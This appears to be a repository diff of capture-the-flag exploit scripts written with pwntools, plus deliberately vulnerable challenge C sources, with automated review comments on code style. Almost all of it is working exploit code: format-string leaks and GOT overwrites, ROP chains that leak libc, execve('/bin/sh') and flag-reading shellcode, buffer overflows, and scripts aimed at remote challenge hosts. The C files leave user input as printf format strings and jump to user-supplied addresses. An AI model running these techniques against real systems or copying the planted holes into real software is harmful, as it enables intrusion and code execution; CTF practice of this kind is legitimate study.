for i in range(2): s(b"4")
|
||||
for i in range(2): s(b"3")
|
||||
for i in range(5): s(b"6")
|
||||
s(b"5") # d6
|
||||
inc()
|
||||
for i in range(3): s(b"3")
|
||||
s(b"5")
|
||||
s(b"6") # 48
|
||||
inc()
|
||||
for i in range(4): s(b"3")
|
||||
for i in range(6): s(b"6")
|
||||
s(b"5") # 31
|
||||
inc()
|
||||
for i in range(2): s(b"4")
|
||||
for i in range(3): s(b"6")
|
||||
s(b"3")
|
||||
s(b"5") # d2
|
||||
inc()
|
||||
for i in range(2): s(b"4")
|
||||
for i in range(9): s(b"6")
|
||||
for i in range(2): s(b"3")
|
||||
s(b"5") # b2
|
||||
inc()
|
||||
for i in range(17): s(b"5") # ff
|
||||
inc()
|
||||
s(b"5") # 0f
|
||||
inc()
|
||||
for i in range(2): s(b"3")
|
||||
s(b"5")
|
||||
for i in range(6): s(b"6") # 05
|
||||
s(b"7")
|
||||
|
||||
# execve
|
||||
sc = """
|
||||
lea rdi, [rsi+35]
|
||||
xor rsi, rsi
|
||||
xor rdx, rdx
|
||||
mov rax, 59
|
||||
syscall
|
||||
"""
|
||||
sc = b"\x90"*16 + asm(sc) + b"/bin/sh\0"
|
||||
s(sc)
|
||||
|
||||
r.interactive()
|
||||
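Review bot: The loops `for i in range(3): s(b"3")` and their siblings never use `i`, so naming the variable `_` states that it is a repeat count. The forty-odd hand-unrolled menu sends with trailing hex comments (`# 48`, `# 89`, `# d6`, …) look like one byte being encoded per group; if the menu options really map to fixed operations on a byte, a small helper that takes the target byte and emits the option sequence would replace the block and document the mapping in one place — worth confirming against the binary before refactoring. At minimum a comment above `# read` explaining what each option number does would make the sequence reviewable.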
@@ -0,0 +1,17 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./fmt", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# leak
|
||||
s(b"%136$p.%137$p")
|
||||
r.recvuntil(b"Here: ")
|
||||
out = "".join([unhex(a[2:])[::-1].decode() for a in r.recvlineS().split(".")])
|
||||
print(out)
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,65 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./classroom", checksec=False)
|
||||
libc = target.libc
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendafter(b"> ", a)
|
||||
ss = lambda a: r.send(a)
|
||||
|
||||
# gadgets
|
||||
pop_rdi = lambda a: p64(0x400c43) + p64(a)
|
||||
pop_rsi = lambda a: p64(0x400c41) + p64(a) + p64(0)
|
||||
|
||||
# loop
|
||||
s(b"a")
|
||||
for i in range(4):
|
||||
s(b"y")
|
||||
s(b"a")
|
||||
s(b"y")
|
||||
|
||||
# leak
|
||||
buf = b"A"*136
|
||||
buf += pop_rdi(1)
|
||||
buf += pop_rsi(target.got.write)
|
||||
buf += p64(target.sym.write)
|
||||
buf += pop_rdi(0)
|
||||
buf += pop_rsi(0x60203c)
|
||||
buf += p64(target.sym.read)
|
||||
buf += p64(target.sym.kinder)
|
||||
s(buf)
|
||||
write = u64(r.recv(6).ljust(8, b"\x00"))
|
||||
log.info("write: %#x", write)
|
||||
libc.address = write - libc.sym.write
|
||||
log.info("libc: %#x", libc.address)
|
||||
|
||||
# gadgets
|
||||
jmp_rsi = libc.address + 0x3acf4
|
||||
|
||||
# shellcode
|
||||
sc = """
|
||||
lea rdi, [rsp-87]
|
||||
xor rsi, rsi
|
||||
xor rdx, rdx
|
||||
mov rax, 2
|
||||
syscall
|
||||
mov rdi, rax
|
||||
mov rsi, 0x602500
|
||||
mov dl, 0xff
|
||||
mov rax, 0
|
||||
syscall
|
||||
mov rdi, 1
|
||||
mov rax, 1
|
||||
syscall
|
||||
"""
|
||||
sc = asm(sc) + b"flag.txt\0"
|
||||
sc += b"A"*(136-len(sc))
|
||||
sc += p64(jmp_rsi)
|
||||
ss(p64(4))
|
||||
s(b"a")
|
||||
s(sc)
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,69 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
import re
|
||||
|
||||
context.binary = target = ELF("./chal", checksec=False)
|
||||
libc = target.libc
|
||||
|
||||
# bruteforce lower 12 bits
|
||||
def brute():
|
||||
for a in range(1, 256):
|
||||
for b in range(8, 256, 16):
|
||||
r = process(level="error")
|
||||
partial_ret = (a << 8) | b
|
||||
write = (0x61 - (partial_ret & 0xff)) & 0xff
|
||||
buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode()
|
||||
buf += f"%{write}c%48$hhn".encode()
|
||||
r.sendlineafter(b": ", buf)
|
||||
try:
|
||||
r.recvuntil(b"Type")
|
||||
return r, partial_ret
|
||||
except:
|
||||
r.kill()
|
||||
continue
|
||||
|
||||
# leak
|
||||
r, partial_ret = brute()
|
||||
log.info("ret: %#x", partial_ret)
|
||||
buf = f"%97c%48$hhn".encode()
|
||||
buf += b"AAAA%17$p.%19$p"
|
||||
r.sendlineafter(b": ", buf)
|
||||
r.recvuntil(b"AAAA")
|
||||
leaks = re.findall(r'0x[a-z0-9]+', r.recvS())
|
||||
libc.address = int(leaks[0], 16) - 0x29d68
|
||||
log.info("libc: %#x", libc.address)
|
||||
target.address = int(leaks[1], 16) - 0x1169
|
||||
log.info("elf: %#x", target.address)
|
||||
|
||||
# write
|
||||
partial_ret = int(hex(libc.sym.system)[-4:], 16)
|
||||
buf = f"%{partial_ret}c%12$hn".encode().ljust(16, b"A") + b"%110c%48$hhn".ljust(16, b"A") + p64(target.got.printf)
|
||||
r.sendline(buf)
|
||||
r.sendline(b"/bin/sh")
|
||||
|
||||
r.interactive()
|
||||
|
||||
"""
|
||||
# write
|
||||
partial_ret = 0xe068
|
||||
write = (0x61 - (partial_ret & 0xff)) & 0xff
|
||||
buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode()
|
||||
buf += f'%{write}c%48$hhn'.encode()
|
||||
s(buf)
|
||||
|
||||
# leak
|
||||
buf = f"%97c%48$hhn".encode()
|
||||
buf += b"AAAA%17$p.%19$p"
|
||||
s(buf)
|
||||
r.recvuntil(b"AAAA")
|
||||
leaks = re.findall(r'0x[a-z0-9]+', r.recvS())
|
||||
libc.address = int(leaks[0], 16) - 0x29d68
|
||||
target.address = int(leaks[1], 16) - 0x1169
|
||||
log.info("elf: %#x", target.address)
|
||||
|
||||
# write
|
||||
partial_ret = 0x38f0
|
||||
buf = f"%{partial_ret}c%12$hn".encode().ljust(16, b"A") + b"%110c%48$hhn".ljust(16, b"A") + p64(target.got.printf)
|
||||
r.sendline(buf)
|
||||
"""
|
||||
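Review bot: `brute()` falls off the end and returns `None` when both loops are exhausted, so `r, partial_ret = brute()` then dies with an unhelpful `TypeError`; end the function with `raise RuntimeError("brute force exhausted")` so the failure is explicit. The `r.kill()` branch sits under a bare `except:` (see the earlier note on the 247ctf scanner), and `f"%97c%48$hhn"` is an f-string with no placeholders (ruff F541). The earlier variant kept as a bare triple-quoted string at the end of the file is dead code that is still parsed on every run; delete it or move it to the repo's notes.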
@@ -0,0 +1,14 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./hide", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# buf
|
||||
s(b"%160c%hhn%6$s")
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,21 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./vuln", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b":", a)
|
||||
|
||||
# leak
|
||||
s(b"%23$p")
|
||||
main = int(r.recvline(), 16)
|
||||
log.info("main: %#x", main)
|
||||
win = main - 0x96
|
||||
log.info("win: %#x", win)
|
||||
|
||||
# jmp
|
||||
s(str(hex(win)).encode())
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,56 @@
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <signal.h>
|
||||
#include <unistd.h>
|
||||
|
||||
void segfault_handler() {
|
||||
printf("Segfault Occurred, incorrect address.\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void call_functions() {
|
||||
char buffer[64];
|
||||
printf("Enter your name:");
|
||||
fgets(buffer, 64, stdin);
|
||||
printf(buffer);
|
||||
|
||||
unsigned long val;
|
||||
printf(" enter the address to jump to, ex => 0x12345: ");
|
||||
scanf("%lx", &val);
|
||||
|
||||
void (*foo)(void) = (void (*)())val;
|
||||
foo();
|
||||
}
|
||||
|
||||
int win() {
|
||||
FILE *fptr;
|
||||
char c;
|
||||
|
||||
printf("You won!\n");
|
||||
// Open file
|
||||
fptr = fopen("flag.txt", "r");
|
||||
if (fptr == NULL)
|
||||
{
|
||||
printf("Cannot open file.\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
// Read contents from file
|
||||
c = fgetc(fptr);
|
||||
while (c != EOF)
|
||||
{
|
||||
printf ("%c", c);
|
||||
c = fgetc(fptr);
|
||||
}
|
||||
|
||||
printf("\n");
|
||||
fclose(fptr);
|
||||
}
|
||||
|
||||
int main() {
|
||||
signal(SIGSEGV, segfault_handler);
|
||||
setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
|
||||
|
||||
call_functions();
|
||||
return 0;
|
||||
}
|
||||
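Review bot: `char c; ... while (c != EOF)` stores the `int` result of `fgetc` in a `char`, so on platforms where `char` is unsigned the comparison never becomes true and the loop spins forever, and on signed-char platforms any 0xFF byte in the file ends the read early; declare `int c`. `int win()` also reaches its closing brace without a `return`, and `printf(buffer)` passes user input as the format string — if that is the challenge's intended vulnerability, a one-line comment marking it as such would stop the next reader from "fixing" it to `printf("%s", buffer)`. `segfault_handler` calls `printf` and `exit`, neither of which is async-signal-safe; `write(2, ...)` and `_exit` are the safe equivalents.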
@@ -0,0 +1,40 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./mad_seccomp", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.send(a)
|
||||
|
||||
# shellcode
|
||||
sc = """
|
||||
lea rsi, [rax+108]
|
||||
lea rdx, [rax+200]
|
||||
mov QWORD PTR [rdx], 2
|
||||
mov QWORD PTR [rdx+16], 16
|
||||
mov rax, 437
|
||||
mov rdi, -100
|
||||
mov r10, 24
|
||||
syscall
|
||||
mov rdi, rax
|
||||
mov al, 17
|
||||
lea rsi, [rdx+100]
|
||||
mov rdx, 100
|
||||
sub r10b, r10b
|
||||
syscall
|
||||
lea r11, [rsi]
|
||||
mov QWORD PTR [rsi+100], r11
|
||||
mov QWORD PTR [rsi+108], rax
|
||||
mov rdi, 1
|
||||
lea rsi, [rsi+100]
|
||||
mov rdx, 1
|
||||
mov rax, 20
|
||||
syscall
|
||||
"""
|
||||
sc = asm(sc)
|
||||
sc += b"flag.txt\0"
|
||||
s(sc)
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,44 @@
|
||||
#include <sys/syscall.h>
|
||||
#include <stdio.h>
|
||||
#include <linux/openat2.h>
|
||||
#include <fcntl.h>
|
||||
#include <unistd.h>
|
||||
#include <string.h>
|
||||
|
||||
int main(void){
|
||||
// get syscall num
|
||||
printf("openat2: %d\n", SYS_openat2);
|
||||
printf("pread64: %d\n", SYS_pread64);
|
||||
printf("writev: %d\n", SYS_writev);
|
||||
|
||||
// struct
|
||||
struct open_how how;
|
||||
memset(&how, 0, sizeof(how));
|
||||
how.flags = O_RDWR;
|
||||
how.resolve = RESOLVE_IN_ROOT;
|
||||
size_t size = sizeof(how);
|
||||
|
||||
// openat2
|
||||
const char *file = "flag.txt";
|
||||
long rax = syscall(SYS_openat2, AT_FDCWD, file, &how, size);
|
||||
printf("fd: %d\n", rax);
|
||||
|
||||
// pread64
|
||||
char buf[64];
|
||||
long rax2 = syscall(SYS_pread64, rax, buf, 100, 0);
|
||||
printf("string size: %d\n", rax2);
|
||||
|
||||
// struct
|
||||
char *str = "Some string here";
|
||||
struct iovec {
|
||||
void *iov_base;
|
||||
size_t iov_len;
|
||||
};
|
||||
struct iovec iov[1];
|
||||
iov[0].iov_base = str;
|
||||
iov[0].iov_len = strlen(str);
|
||||
|
||||
// writev
|
||||
syscall(SYS_writev, 1, iov, 1);
|
||||
return 0;
|
||||
}
|
||||
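Review bot: `syscall(SYS_pread64, rax, buf, 100, 0)` asks for 100 bytes into `char buf[64]`, a stack overflow for any file longer than 63 bytes; pass `sizeof(buf)` instead of `100`. `printf("fd: %d\n", rax)` and `printf("string size: %d\n", rax2)` print a `long` with `%d`, which is undefined; use `%ld`. The openat2 result is never checked for `< 0` before being reused as the fd, and the descriptor is never closed before `writev`.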
@@ -0,0 +1,17 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./namelen", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*7
|
||||
buf += b"i"
|
||||
buf += b"A"*(20-len(buf))
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,23 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./chall", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# leak
|
||||
r.recvuntil(b": ")
|
||||
stack_addr = int(r.recvline(), 16)
|
||||
log.info("stack_addr: %#x", stack_addr)
|
||||
|
||||
# buf
|
||||
sc = asm(shellcraft.sh())
|
||||
sc += b"\x90"*(88-len(sc))
|
||||
buf = sc
|
||||
buf += p64(stack_addr)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
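Review bot: `sc += b"\x90"*(88-len(sc))` relies on `bytes * n` with a negative `n` quietly yielding `b""`, so if the assembled block ever exceeds 88 bytes the padding disappears without any error and the following `p64(stack_addr)` lands at the wrong offset. A one-line guard makes the failure visible: `assert len(sc) <= 88, f"shellcode too long: {len(sc)}"` before the padding. The `s = lambda ...` wrapper is the same style point raised on the namelen script above.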
@@ -0,0 +1,38 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./shellhard", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b": ", a)
|
||||
|
||||
# stage 1
|
||||
sc = """
|
||||
mov rsi, rdx
|
||||
cqo
|
||||
mov dl, 0xff
|
||||
syscall
|
||||
"""
|
||||
sc = asm(sc)
|
||||
s(sc)
|
||||
|
||||
# stage 2
|
||||
sc = """
|
||||
lea rsi, [rcx+48]
|
||||
mov edi, -100
|
||||
xor rdx, rdx
|
||||
xor r10, r10
|
||||
mov rax, 257
|
||||
syscall
|
||||
mov rsi, rax
|
||||
mov rdi, 1
|
||||
add r10b, 0xff
|
||||
mov rax, 40
|
||||
syscall
|
||||
"""
|
||||
sc = b"\x90"*10 + asm(sc) + b"flag.txt\0"
|
||||
s(sc)
|
||||
|
||||
r.interactive()
|
||||
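Review bot: The stage-2 block `lea rsi, [rcx+48]` and the `b"\x90"*10` prefix in `sc = b"\x90"*10 + asm(sc) + b"flag.txt\0"` depend on register and buffer state left by stage 1, and nothing in the file records what that state is; a short comment above `# stage 2` stating what `rcx` is expected to hold and how the constants 48 and 10 were derived would make the script maintainable when the binary or libc changes. Two constants in the assembly also deserve a one-word annotation so they are not mistaken for magic: `mov edi, -100  ; AT_FDCWD` and `mov rax, 257  ; openat`. In stage 1, `mov dl, 0xff` only gives the intended value because `cqo` zeroed rdx on the previous line, which is worth a comment as well.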
@@ -0,0 +1,27 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./valley", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b": ", a)
|
||||
ss = lambda a: r.sendline(a)
|
||||
|
||||
# leak
|
||||
s(b"%20$p.%21$p")
|
||||
r.recvuntil(b": ")
|
||||
leaks = r.recvlineS().split(".")
|
||||
stack_addr = int(leaks[0], 16) - 0x8
|
||||
log.info("stack_addr: %#x", stack_addr)
|
||||
print_flag = int(leaks[1], 16) - 0x1aa
|
||||
log.info("print_flag: %#x", print_flag)
|
||||
write_bytes = int(str(hex(print_flag))[-4:], 16)
|
||||
fs = f"%{write_bytes}x%8$hnAAAA".encode()
|
||||
|
||||
# write
|
||||
ss(fs+p64(stack_addr))
|
||||
ss(b"exit")
|
||||
|
||||
r.interactive()
|
||||
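Review bot: `write_bytes = int(str(hex(print_flag))[-4:], 16)` goes through a string round-trip to take the low 16 bits of an integer; `hex()` already returns a `str`, and `write_bytes = print_flag & 0xffff` states the intent directly without the conversion. `leaks = r.recvlineS().split(".")` is then indexed at `[0]` and `[1]` with no length check, so a leak line that does not contain the separator fails with an IndexError rather than a message naming the leak; unpacking as `leak0, leak1 = r.recvlineS().split(".")` at least fails with a ValueError on the right line. The `s`/`ss` lambdas are the style point raised on the namelen script above.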
@@ -0,0 +1,49 @@
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
|
||||
void print_flag() {
|
||||
char buf[32];
|
||||
FILE *file = fopen("/home/valley/flag.txt", "r");
|
||||
|
||||
if (file == NULL) {
|
||||
perror("Failed to open flag file");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
fgets(buf, sizeof(buf), file);
|
||||
printf("Congrats! Here is your flag: %s", buf);
|
||||
fclose(file);
|
||||
exit(EXIT_SUCCESS);
|
||||
}
|
||||
|
||||
void echo_valley() {
|
||||
printf("Welcome to the Echo Valley, Try Shouting: \n");
|
||||
|
||||
char buf[100];
|
||||
|
||||
while(1)
|
||||
{
|
||||
fflush(stdout);
|
||||
if (fgets(buf, sizeof(buf), stdin) == NULL) {
|
||||
printf("\nEOF detected. Exiting...\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
if (strcmp(buf, "exit\n") == 0) {
|
||||
printf("The Valley Disappears\n");
|
||||
break;
|
||||
}
|
||||
|
||||
printf("You heard in the distance: ");
|
||||
printf(buf);
|
||||
fflush(stdout);
|
||||
}
|
||||
fflush(stdout);
|
||||
}
|
||||
|
||||
int main()
|
||||
{
|
||||
echo_valley();
|
||||
return 0;
|
||||
}
|
||||
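Review bot: `printf(buf);` in echo_valley passes user input as the format string; this appears to be the challenge's intended bug, but nothing in the source marks it as deliberate, so add `// intentionally vulnerable: user-controlled format string` (or a file header saying this is CTF challenge source) so the file is not copied as a pattern — a non-challenge build would write `printf("%s", buf);`. In print_flag the `fgets` return value is unchecked, so an empty or unreadable flag file prints whatever is in the uninitialised `buf`; `if (fgets(buf, sizeof(buf), file) == NULL) { perror("Failed to read flag"); exit(EXIT_FAILURE); }` closes that gap. `int main()` is an old-style declarator; `int main(void)` matches the openat2 helper earlier in this series.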
@@ -0,0 +1,27 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./voidexec", checksec=False)
|
||||
libc = target.libc
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.send(a)
|
||||
|
||||
# shellcode
|
||||
sc = f"""
|
||||
xor rsi, rsi
|
||||
xor rdx, rdx
|
||||
mov r9, [rsp+32]
|
||||
sub r9, {libc.sym.__libc_start_call_main+128}
|
||||
mov rdi, r9
|
||||
add rdi, {next(libc.search(b"/bin/sh\0"))}
|
||||
mov r15, r9
|
||||
add r15, {libc.sym.execve}
|
||||
call r15
|
||||
"""
|
||||
sc = asm(sc)
|
||||
s(sc)
|
||||
|
||||
r.interactive()
|
||||
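Review bot: `mov r9, [rsp+32]` and `sub r9, {libc.sym.__libc_start_call_main+128}` rest on two unexplained constants — which saved stack slot is read, and the 128-byte distance into `__libc_start_call_main` — that are only valid for the libc build the ELF was resolved against; a comment recording the libc version or build id these were measured with tells the next reader when the script needs re-measuring. `libc = target.libc` evaluates to `None` when pwntools cannot resolve the binary's libc, in which case the f-string fails later with an AttributeError on `libc.sym` instead of a clear message; `assert libc is not None, "could not resolve libc for target"` directly after that line makes the precondition explicit. The `s = lambda a: r.send(a)` wrapper is the style point raised on the namelen script above.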
@@ -0,0 +1,17 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./B00fer", checksec=False)
|
||||
# r = process()
|
||||
r = remote("b00fer.niccgetsspooky.xyz", 9001)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*40
|
||||
buf += p64(0x401227)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
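Review bot: The local/remote selection is done by commenting out `# r = process()` above `r = remote("b00fer.niccgetsspooky.xyz", 9001)`, so the committed script can only be run against the live host; pwntools' `args` turns this into a command-line switch, `r = remote("b00fer.niccgetsspooky.xyz", 9001) if args.REMOTE else process()`. The pwn101 script below has the same commented-out pair and would take the same change. `buf += p64(0x401227)` is a bare address with no symbol name; if it corresponds to a function in the ELF, `target.sym["<function-name>"]` both documents it and survives a rebuild of the binary.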
@@ -0,0 +1,17 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./pwn101", checksec=False)
|
||||
# r = process()
|
||||
r = remote("10.10.110.117", 9001)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b":", a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*60
|
||||
buf += p32(0x1337)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||